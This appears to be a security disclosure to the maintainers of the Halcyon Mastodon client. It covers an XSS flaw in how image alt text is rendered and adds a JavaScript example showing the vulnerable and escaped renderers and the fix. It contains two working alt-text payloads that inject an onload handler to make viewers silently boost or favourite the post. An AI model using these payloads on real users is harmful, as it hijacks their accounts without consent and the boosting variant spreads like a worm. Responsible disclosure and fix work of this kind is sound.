The parser for alt text (or title text, to be specific) has an injection vulnerability; quotation marks are not escaped. This makes it possible to specify any attribute to the `img` element I want, such as `class` and `onload`, where I can place arbitrary JS.
Tested with a private post, I was able to create a self-favouriting post (which can be easily adapted to be self-boosting) that also presents a dialog box informing the visitor of the XSS attack.
Here's an example of the alt text that one can specify for an image that will create a self-boosting post.
```
this is an image of some kind "class="xss" onload="let reboostBtnXSS = $('.xss').parents('.toot_content').find('.boost_button'); if (reboostBtnXSS.attr('reblogged') == 'false') reboostBtnXSS.click(); alert('XSS in Halcyon')"
```
If one were to then post that (publicly, to enable the boost button), anyone using the Halcyon client who loads that post containing an image with that as its alt text would find that they had boosted it without their knowledge.
Here's the version for a self-favouriting post, which I have tested privately.
```
this is an image of some kind "class="xss" onload="let favBtnXSS = $('.xss').parents('.toot_content').find('.fav_button'); if (favBtnXSS.attr('favourited') == 'false') favBtnXSS.click(); alert('self-favourited post')"
```
I know this repository hasn't been updated in a while, but I am hoping you will still respond to security vulnerabilities.
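To make the root cause and the fix concrete, here is an added example in JavaScript; it is not Halcyon's own code. `renderImgVulnerable` is a hypothetical rendering function that interpolates the description straight into the attribute, as the report describes, and `renderImgEscaped` is the corrected form that entity-encodes every attribute-significant character. `attributeNames` is a small tokenizer written for this example that lists the attributes a browser's HTML parser would see on the rendered tag, and `SAMPLE_DESCRIPTION` is a constructed input modelled on the payload quoted above.

```javascript
// Added example, not Halcyon's code: attribute injection via unescaped
// alt/title text, and the attribute-value escaping that prevents it.

// Hypothetical vulnerable renderer: the description is dropped into the
// attribute without escaping, so a '"' in it closes the attribute early.
function renderImgVulnerable(src, description) {
  return `<img src="${src}" alt="${description}" title="${description}">`;
}

// Escape the characters that matter inside a double- or single-quoted HTML
// attribute value. '&' is handled first so existing entities are not broken.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Corrected renderer: every untrusted value passes through escapeAttr.
function renderImgEscaped(src, description) {
  const safe = escapeAttr(description);
  return `<img src="${escapeAttr(src)}" alt="${safe}" title="${safe}">`;
}

// Lists the attribute names an HTML parser would produce for the first tag.
// Like the browser tokenizer, a new attribute name may start immediately after
// a quoted value, which is exactly how the injected class/onload appear.
function attributeNames(tag) {
  const names = [];
  const end = tag.length;
  let i = tag.indexOf(' '); // skip the tag name ("<img")
  if (i === -1) return names;
  while (i < end) {
    const c = tag[i];
    if (/\s/.test(c)) { i++; continue; }
    if (c === '>') break;
    let name = '';
    while (i < end && !/[\s=>]/.test(tag[i])) { name += tag[i]; i++; }
    if (name) names.push(name.toLowerCase());
    while (i < end && /\s/.test(tag[i])) i++;
    if (tag[i] === '=') {
      i++;
      while (i < end && /\s/.test(tag[i])) i++;
      const q = tag[i];
      if (q === '"' || q === "'") {
        const close = tag.indexOf(q, i + 1);
        i = close === -1 ? end : close + 1;
      } else {
        while (i < end && !/[\s>]/.test(tag[i])) i++;
      }
    }
  }
  return names;
}

// Constructed sample input, shaped like the report's payload but with a
// harmless body, used only to compare the two renderers.
const SAMPLE_DESCRIPTION = 'a picture "class="xss" onload="alert(1)"';

// Returns true when the rendered tag exposes an injected event handler.
function hasInjectedHandler(renderedTag) {
  return attributeNames(renderedTag).some((n) => n.startsWith('on'));
}

console.log('vulnerable:', attributeNames(renderImgVulnerable('x.png', SAMPLE_DESCRIPTION)));
console.log('escaped:   ', attributeNames(renderImgEscaped('x.png', SAMPLE_DESCRIPTION)));
```

The vulnerable renderer yields a tag on which the parser sees `class` and `onload` as real attributes; the escaped one yields only `src`, `alt` and `title`, with the quotation marks preserved as `&quot;` in the visible title. In browser-side code the simplest fix is to avoid string building altogether and set the value with `img.setAttribute('alt', description)` on an element created by `document.createElement`, which never interprets the value as markup.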